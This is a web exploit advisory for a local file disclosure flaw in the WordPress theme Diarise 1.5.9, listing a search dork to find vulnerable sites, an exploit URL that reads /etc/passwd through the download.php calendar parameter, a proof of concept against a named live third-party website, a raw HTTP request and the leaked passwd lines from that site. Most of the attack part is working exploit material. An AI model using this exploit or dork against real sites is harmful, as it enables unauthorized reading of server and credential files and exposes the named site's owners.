WordPress Diarise 1.5.9 Local File Disclosure

2019.05.11

Credit: Felipe Andrian Peixoto

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-98

Dork: inurl:"wp-content/themes/diarise/"

[+] Local File Disclosure in wordpress theme Diarise

[+] Date: 07/05/2019

[+] CWE Number: CWE-98

[+] Risk: High

[+] Author: Felipe Andrian Peixoto

[+] Dork: inurl:"wp-content/themes/diarise/"

[+] Vendor Homepage: https://woocommerce.com/?aff=1790

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Vulnerable File: download.php

[+] Exploit : http://domain.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]

[+] PoC: http://tringanglers.org.uk/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd

[+] Example:

	GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1
	Host: tringanglers.org.uk
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
	Accept-Encoding: gzip, deflate
	DNT: 1
	Connection: keep-alive
	Upgrade-Insecure-Requests: 1

	root:x:0:0:root:/root:/bin/false
	tringanglers.org.uk:x:987900:987900:tringanglers.org.uk:/home/tringanglers.org.uk:/bin/false

eof

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Diarise 1.5.9 Local File Disclosure

Dork: inurl:"wp-content/themes/diarise/"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.